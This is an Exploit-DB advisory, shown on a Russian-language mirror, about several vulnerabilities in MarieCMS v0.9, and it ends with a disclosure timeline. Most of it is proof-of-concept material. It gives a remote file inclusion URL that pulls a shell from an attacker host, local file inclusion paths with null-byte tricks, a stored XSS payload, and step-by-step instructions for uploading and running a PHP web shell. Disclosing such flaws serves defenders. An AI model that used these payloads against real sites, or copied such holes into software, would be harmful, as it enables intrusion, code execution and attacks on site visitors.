- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10351
- Проверка EDB
-
- Пройдено
- Автор
- AMOL NAIK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-07
Код:
############
OVERVIEW
############
MarieCMS v0.9 vulnerable to following issues:
++ Remote File Inclusion
++ Local File Inclusion
++ Persistent XSS
++ Shell Upload (Authenticated User)
######################
PoC
######################
# Remote File Inclusion:
++++++++++++++++++++++++
http://server/mariecms/?page=http://[attacker]/[site]/shell.txt?
# Local File Inclusion:
+++++++++++++++++++++++
http://server/mariecms/?mod=../../../../../../../../../../boot.ini%00
http://server/mariecms/admin/index.php?mod=../../../../../../../../../../../../boot.ini%00
# Persistent XSS:
+++++++++++++++++
Put <script>alert("XSS")</script> in "Name" field on page
http://server/mariecms/?page=addgb&mod=gaestebuch
# Shell Upload (Authenticated User):
+++++++++++++++
1. Rename shell.php to shell.jpg.php
2. Upload it into galleryupload section.
3. View images to get image id for shell.jpg.php
4. Access shell:
http://[server]/[path]/_images/[image_id].php?cmd=dir
############
TimeLine
############
Bug discovered : 26/11/2009
Informed Vendor : 30/11/2009 -- No reply received from vendor till the date
Public Disclosure : 02/12/2009- Источник
- www.exploit-db.com
